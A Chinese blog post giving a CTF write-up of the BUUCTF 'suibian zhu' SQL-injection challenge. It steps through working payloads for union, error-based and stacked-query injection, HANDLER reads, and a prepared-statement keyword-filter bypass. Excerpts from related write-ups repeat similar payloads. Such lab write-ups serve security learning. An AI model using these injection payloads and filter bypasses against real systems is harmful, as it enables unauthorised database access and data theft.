BUUCTF之随便注

最新推荐文章于 2024-09-04 17:16:55 发布
最新推荐文章于 2024-09-04 17:16:55 发布
阅读量5.5k 收藏 12
点赞数 2
分类专栏: CTFのWriteUp 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/l2872253606/article/details/123943828
版权

目录

审题

字段判定

字段数

字段回显

爆表

报错盲注

堆叠注入

字段查询

handler查询法

预编译绕过法

审题

打开连接

emmm,好眼熟的题目,这不是跟攻防世界的一道题一模一样吗

攻防世界之supersqli_金 帛的博客-优快云博客

无奈再做一次吧

字段判定

字段数

输入数字查询,直到3的时候无回显,字段数应该为2

用order by来测试也是,没有第三个字段,所以字段为2

字段回显

知道字段数,直接联合注入,查看回显,构建payload

inurl?inject=-1' union select 1,2 --+

发现好多关键字被过滤掉了,所以不能走select这条路子了,我们还有报错注入,堆叠注入

爆表

报错盲注

考虑到select被过滤,现在也就只有两种报错盲注能用

第一种,构建payload

inurl?inject=1' or updatexml(1,concat(0x7e,(database())),0) or#

emmm,又被过滤掉了,那接着试试第二种,构建payload

inurl?inject=1' or extractvalue(1,concat(0x7e,(database())),0) or#

emmm,又被过滤掉了,那只有堆叠能用了

堆叠注入

顾名思义,利用分号(;)一下子能执行多条语句,先看看数据库有啥,构建payload

inurl?inject=-1'; show databases;# 

爆了好多数据库,排除几个常见的数据库,接着一个个看一下表,构建payload

inurl?inject=-1';use ctftraining;show tables;#  

第一个表好可疑,看一下有什么字段

inurl?inject=-1';use ctftraining;show columns from FLAG_TABLE;# 

只有一个字段,第一个string是指字段名,第五个string是备注的内容,已经提示了,没有flag

 那就回去看一下supersqli这个表吧

 看一下第一个纯数字的表,注意纯数字的表名得用`包裹,构建payload

inurl?inject=-1';use supersqli;show columns from `1919810931114514`;# 

 好了,知道flag在哪了,接着就是怎么查询到这个的问题了

字段查询

handler查询法

MYSQL神秘的HANDLER命令与实现方法_Mysql_脚本之家 (jb51.net)

mysql handler语句之一 - MySQL数据库 - 亿速云 (yisu.com)

让我们在本地环境试试看怎么用

噢噢,懂了,这就构建payload

 inurl?inject=-1';use supersqli;handler `1919810931114514` open as p;handler p read first;#

拿到flag

预编译绕过法

先说说预编译吧,简单来说,预编译就是先set(定义)一个变量@a,然后prepare(准备)一个b从@a那获得,然后execute(执行) b,也就是变相地执行了@a的语句

当然我们还可以利用concat函数来联合@a里的内容,来绕过过滤

利用预编译绕过select 就能直接拿到flag了,构建payload

inurl?inject=-1';set @sql = concat('sele','ct flag from `1919810931114514`;');prepare stmt from @sql;execute stmt;#

可以看到set跟prepare被strstr函数给检测出来了,但是strstr函数不区分大小写,所以我们可以用大小写法绕过,把set改成SeT,prepare改成PrePare

 拿到flag

BUUCTF 随便WP
小白渣的博客
12-19 1270
首先我们先看到题目,我们由题意可知是sql入 于是用 ’ 试试 然后我们尝试一些入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
BUUCTF Web [强网杯 2019]随便
2501_90251165的博客
01-16 914
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容。
BUUCTF——随便
weixin_45864041的博客
09-21 794
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行入,所以我们换一个思路,看一看是否可以进行堆叠入 通过上面的测试可以看到,可以进行堆叠入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 987
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错入,被过滤了使用联合入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
BUUCTF-随便
m0_74167420的博客
03-10 1710
报错入:报错入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。堆叠入:mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠入其实就是通过结束符来执行多条sql语句。(1)报错盲,构建payload:第一种payload:inurl?
BUUCTF-web-随便
nareku的博客
07-06 1423
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf web随便
最新发布
02-11
### 关于BUUCTF Web类别SQL入入门题目教程 #### 背景介绍 在网络安全竞赛(CTF)中,Web安全挑战占据了重要位置。其中,SQL入作为常见的攻击手段之一,在多个平台上都有所体现。对于初学者而言,《从0到1:...
BUUCTF-Web-随便-wp
single7_的博客
12-14 457
0x01 知识点 SQL入-堆叠入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种入方式称为堆叠入。 union injection(联合入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语
buuctf-随便
xixihahawuwu的博客
11-23 309
上没有什么提示,进入环境 有一个提交查询,点击查询,数字为1时回显如下 数字为2回显如下,且文本框内数字自动变为1 当数字大于2时,页面不会返回内容。说明字段数为2 看下源码 咳咳,这就过分了哈.我偏要用 先试下’ 再select下 回显了关键字的过滤,union入没法用 这里有一个知识点就是“堆积入” 其实就是加了;之后接着入 1’;show databases;爆下数据库 再爆个表 好啊。尝试下把表内容爆出来 1’;show columns from words; 没啥有用的 下一个,这
BUUCTF【WEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 511
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
ctf (随便)
Glacier_Mount的博客
07-10 1013
简单的堆叠入。
BUUCTF随便
m0_54993799的博客
12-22 518
输入 1' and updatexml(1, (concat(0x7e,(select database()),0x7e)),1)利用数据库的表的特性,将原来的words表改名为words123,将1919那张表改名为 words;如果直接查值,那就需要 select,但是select已经被限制了。除了查询id=1的值,还把数据库的名字都查出来了。发现一些关键字被限制了,但分号没有被限制,输入 1'"# ,页面返回报错信息。输入 1'# ,得到如下页面。再提交 ' or 1=1 #
堆叠入——BUUCTF-随便
ancan8807的博客
09-07 701
由题目提示知道,这题需要进行sql入 输入1'发现报错 再输入1';show batabases#出现了一大堆数据库 再输入1';show tables#出现了两个表 猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现 因为select被过滤了,所以先将select *...
BUUCTF-随便、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 988
目录[强网杯 2019]随便[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 3079
buuctf的强网杯2019为例的堆叠
buuctf [强网杯 2019]随便
qq_1873822的博客
03-01 304
堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *
BUUCTF Web [强网杯 2024]随便
2401_86454378的博客
09-04 1011
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容喜欢一个东西首先要先学会「尊重」,虽然网络安全的圈子不乏各种灰产,以及高调宣传自己是黑客的脚本小子,但不可否认,这个圈子仍有不少人保持着「举世皆浊我独清,众人皆醉我独醒」的心态,努力磨砺技术,提升自身修养,让互联网变得更加安全。
buuctf 2019强网杯 随便
devilare的博客
09-26 386
2019强网杯 随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值